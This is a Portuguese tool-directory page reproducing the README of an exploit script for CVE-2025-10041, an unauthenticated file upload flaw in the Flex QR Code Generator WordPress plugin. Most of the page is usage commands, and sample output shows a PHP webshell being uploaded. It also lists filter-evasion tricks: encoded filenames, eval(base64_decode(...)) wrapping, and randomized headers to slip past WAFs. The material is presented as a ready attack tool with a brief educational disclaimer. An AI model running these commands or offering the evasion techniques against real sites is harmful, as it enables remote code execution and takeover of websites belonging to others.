Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-10041 — Flex QR Code Generator <= 1.2.5 - Upload Arbitrário de Arquivos Não Autenticado | Kitploit
Ferramentas/GitHubGitHub/nxploited/cve-2025-10041
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoEvasão de IDS/IPSExploração de Aplicações WebBypass de WAF
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Upload Arbitrário de Arquivos Não Autenticado

Ver Repositório
34há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Upload Arbitrário de Arquivos Não Autenticado

🚨 Flex QR Code Generator ≤ 1.2.5 - Upload Arbitrário de Arquivos Não Autenticado


📝 Descrição

O plugin Flex QR Code Generator para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função save_qr_code_to_db() em todas as versões até, e incluindo, 1.2.5.
Isso permite que atacantes não autenticados façam upload de arquivos maliciosos para o servidor do site afetado, potencialmente levando à execução remota de código.

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (Crítico)

💡 Sobre Este Script

O CVE-2025-10041.py é uma ferramenta de exploit profissional projetada para automatizar o ataque aproveitando esta vulnerabilidade.
Ele oferece recursos avançados para contornar proteções comuns e técnicas de codificação.


⚙️ Recursos

  • Detecção automática de vulnerabilidade (verificação de versão)
  • Upload arbitrário de arquivos (incluindo webshells PHP)
  • Bypass de codificação de nome de arquivo: codificação Base64 ou URL
  • Bypass de codificação de conteúdo: wrapper base64 PHP para código de shell
  • Cabeçalhos HTTP aleatórios para evadir WAFs básicos
  • Suporte a cabeçalhos personalizados
  • Interface de linha de comando completa com análise de argumentos e mensagem de ajuda

🖥️ Uso

1. Exploit Básico

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. Codificação do Nome do Shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. Codificação do Conteúdo do Shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. Nome de Shell Personalizado

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. Avançado (Combinar Opções)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. Cabeçalhos Personalizados

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 Ajuda

Para ver todas as opções disponíveis e instruções de uso:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 Técnicas de Bypass

  • Codificação do nome do arquivo: Alguns servidores bloqueiam .php ou nomes suspeitos; a codificação pode evadir filtros.
  • Codificação do conteúdo: Envolver o código do shell em eval(base64_decode(...)) pode contornar filtros de conteúdo.
  • Cabeçalhos aleatórios: Rotacionar user-agent, referer e cookies para evitar detecção.
  • Cabeçalhos personalizados: Adicione seus próprios cabeçalhos para evasão avançada.

📋 Exemplo de Saída

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ Aviso Legal

Este script é fornecido apenas para fins educacionais, de pesquisa e de teste de penetração autorizado.
O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é estritamente proibido e ilegal.
O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.


✍️ Por:

Nxploited (Khaled Alenazi)


Baixar ferramenta